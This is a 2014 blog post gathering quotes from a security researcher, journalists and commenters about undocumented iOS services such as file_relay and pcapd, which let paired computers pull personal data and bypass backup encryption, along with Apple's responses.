Saturday, July 19, 2014

iOS Backdoors, Attack Points, and Surveillance Mechanisms

Jonathan Zdziarski (PDF):

Overall, the otherwise great security of iOS has been compromised…by Apple…by design.

Via Michael Yacavone.

Update (2014-07-22): Jonathan Zdziarski:

I have NOT accused Apple of working with NSA, however I suspect (based on released documents) that some of these services MAY have been used by NSA to collect data on potential targets. I am not suggesting some grand conspiracy; there are, however, some services running in iOS that shouldn’t be there, that were intentionally added by Apple as part of the firmware, and that bypass backup encryption while copying more of your personal data than ever should come off the phone for the average consumer. I think at the very least, this warrants an explanation and disclosure to the some 600 million customers out there running iOS devices. At the same time, this is NOT a zero day and NOT some widespread security emergency. My paranoia level is tweaked, but not going crazy. My hope is that Apple will correct the problem. Nothing less, nothing more. I want these services off my phone. They don’t belong there.

Dan Goodin:

Zdziarski said the service that raises the most concern is known as com.apple.mobile.file_relay. It dishes out a staggering amount of data—including account data for e-mail, Twitter, iCloud, and other services, a full copy of the address book including deleted entries, the user cache folder, logs of geographic positions, and a complete dump of the user photo album—all without requiring a backup password to be entered. He said two other services dubbed com.apple.pcapd and com.apple.mobile.house_arrest may have legitimate uses for app developers or support people but can also be used to spy on users by government agencies or even jilted ex-lovers. The Pcapd service, for instance, allows people to wirelessly monitor all network traffic traveling into and out of the device, even when it’s not running in a special developer or support mode. House_arrest, meanwhile, allows the copying of sensitive files and documents from Twitter, Facebook, and many other applications.

[…]

Zdziarski said the services aren’t easy for anyone to abuse, making it unlikely that hackers could exploit them on a wide scale. Still, he said the functions are within easy reach of technically knowledgeable people who have access to a computer, electric charger, or other device that has ever been modified to digitally pair with a targeted iPhone or iPad. During the pairing process, iDevices create a file containing a set of digital keys. Anyone with access to such files can make almost unfettered use of the services, often wirelessly, until the iPhone or iPad undergoes a factory reset.

Dan Moren:

The company also reiterated its stance that it doesn’t compromise its systems for the purpose of providing those access points to the authorities: “As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services.”

While such statements may be intended to assuage fears over the privacy implications of these systems, they’re hard to classify as categorical denials in this case. For one thing, Apple hasn’t yet explained why anybody needs the breadth of information that these tools seem to provide access to, nor why these services, if indeed for diagnostic use, are not presented for users to opt into. In the case of enterprise environments where devices are provided by a company, users are generally made aware of the access that IT departments have to their devices. But when we’re talking about the general public, no such warning is given—nor should it be needed.

[…]

Apple has taken a firm stand on privacy, and it’s disappointing to see the company not fully and transparently explaining why these systems have the range of access that they do, why they circumvent security processes the company itself put into place, and why there’s no way for a user to easily disable them. That’s the kind of attitude that we’ve grown to expect from the company, and we’d like to see them live up to it.

Update (2014-07-23): Jonathan Zdziarski:

In a response from Apple PR to journalists about my HOPE/X talk, it looks like Apple might have inadvertently admitted that, in the classic sense of the word, they do indeed have back doors in iOS, however claim that the purpose is for “diagnostics” and “enterprise”.

[…]

The problem with this is that these services dish out data (and bypass backup encryption) regardless of whether or not “Send Diagnostic Data to Apple” is turned on or off, and whether or not the device is managed by an enterprise policy of any kind. So if these services were intended for such purposes, you’d think they’d only work if the device was managed/supervised or if the user had enabled diagnostic mode. Unfortunately this isn’t the case and there is no way to disable these mechanisms. As a result, every single device has these features enabled and there’s no way to turn them off, nor are users prompted for consent to send this kind of personal data off the device.

[…]

Obviously, Apple realized that pairing in and of itself offered very little security, as they added backup encryption to all backups as a feature – something that also requires pairing to perform. So Apple doesn’t trust pairing as a “security” solution either. And for good reason: it wasn’t designed to be secure. It is not two factor; it is not encrypted with a user paraphrase; it is simply “something you have” that gives you complete unfettered access to the phone. And it can be had as easily as copying one file, or created on the fly via USB. It can be used if law enforcement seizes your computer; it can be stolen by someone hacking in; it is by all means insecure. But even with the pairing record, I would have expected the data that comes off my device to be encrypted with the backup password, right? These services completely bypass this.

Apple responds on its site, but doesn’t really address what people are concerned about (via Cabel Sasser).

Update (2014-07-24): Dan Goodin:

The episode is a good example of the way Apple’s trademark secrecy can come back to bite the company. Apple may have legitimate reasons for folding these services into iOS, even when it isn’t running in special diagnostic or support modes. But the company never took the time to disclose these services or to respond to Zdziarski’s private entreaties to executives until the undocumented functions became an international news story. Zdziarski’s larger point seems to be that the services he brought to light represent vectors that ex-lovers, housemates, co-workers and, yes, spy agencies can exploit to bypass cryptographic protections designed to prevent sensitive data from being accessed by unauthorized parties. Until last weekend, that point was only implicit. It has now been made explicit.

Wickwick:

Example: You’re dating someone who uses your laptop when she visits. Unbeknownst to you, she emails herself the keys from your laptop.

You break up. She visits the same Starbucks as you. While you’re reading emails, whatever she uses the wifi to turn on File relay and copies everything off your phone. There’s no alert, there’s no dialog box. Your phone just starts dumping information.

All an adversary needs is temporary access to a single trusted device once and they have the keys to the kingdom forever.

joosters:

What’s really disappointing is that there seems to be an all-or-nothing security model here. If I pair my phone with a computer, then suddenly it has complete access to spy on me, install monitoring tools that can continue to run, etc. Why can’t there be a way where I can transfer music/photos to/from my phone without providing this full device access?

You’d be pretty annoyed if the front door to your house, when you opened it, also opened up your document safe, emptied your wallet onto the floor and invited visitors to leave bugging devices to spy on you later.

Also, the defence of “just don’t agree to pair your phone with an unknown USB device” can actually be tricky. On a flight, I plugged my phone into the USB port on the seatback to charge it. The phone repeatedly kept asking if I wanted to pair it with something (who knows what it was? the entertainment system, maybe?). If I had accidentally hit the wrong button only once (on a prompt that randomly appeared), my phone could have been owned, and there’s no easy way to un-pair.

Update (2014-07-28): Jonathan Zdziarski:

In iOS, pcapd is available on every iOS device out there, and can be activated on any device without the user’s knowledge. You also don’t have to be enrolled in an enterprise policy, and you don’t have to be in developer mode. What makes this service dangerous is that it can be activated wirelessly, and does not ask the user for permission to activate it… so it can be employed for snooping by third parties in a privileged position.

[…]

Apple is being completely misleading by claiming that file relay is only for copying diagnostic data. If, by diagnostic data, you mean the user’s complete photo album, their SMS, Notes, Address Book, GeoLocation data, screenshots of the last thing they were looking at, and a ton of other personal data – then sure… but this data is far too personal in nature to ever be needed for diagnostics.

[…]

Additionally, this claim that your data is respected with data-protection encryption. The pairing record that is used to access all of this data is sent an escrow bag, which contains a backup copy of your key bag keys for unlocking data protection encryption. So again, we’re back to the fact that with any valid pairing, you have access to all of this personal data – whether it was Apple’s intention or not.

Now I hear the argument pop up from a few people who don’t understand how all of this works that, “of course you can dump personal info after you’ve paired, it’s supposed to sync your data”. Well, no. The trust dialog (the only pairing security there is) was only an afterthought that got added last year after another researcher showed how easily you could hijack iOS 6 by simply plugging it into a malicious charger. In fact, Apple added backup encryption to iOS specifically because they realized people’s devices were pairing with a bunch of hardware that the user didn’t trust. If pairing were meant to be a means to security, there would be no need for backup encryption at all.

[…]

In addition to downplaying the services themselves, Apple has stated that the user must “explicitly grant consent” for these services to be used. This is not the case. The user has had no idea these services even exist at all on the device until recently. There is no dialog asking the user to allow the packet sniffer to run, or to access your photos/contacts/sms/etc to provide to AppleCare (the dialogs you’re used to seeing third party apps present are not presented when these services are accessed). This consent simply doesn’t exist. The only consent is pushing that “trust” button, which (unbeknownst to the user) gives complete carte blanche access to the mobile device, wirelessly, indefinitely, and bypassing the backup encryption that the user believes is protecting their data from unwanted eyes.

Jonathan Zdziarski:

In spite of my warnings to the media (via email and telephone inquiries) not to pitch this as a conspiracy theory, they have still managed to completely derail the original intention of this research, and so I think a quick proof-of-concept video will help to clear up any misunderstandings about what this technique can and can’t do. I’ve also outlined the threat models that will and won’t work for this attack.

2 Comments RSS · Twitter

About what I expected...

(On the OS X side, my guess is that nothing beyond Snowy is safe, assuming Little Snitch. And I don't even trust rev2 of the final Snowy update.)

[…] Jonathan Zdziarski on the changes in iOS that address his reported iOS Backdoors, Attack Points, and Surveillance Mechanisms: […]

Leave a Comment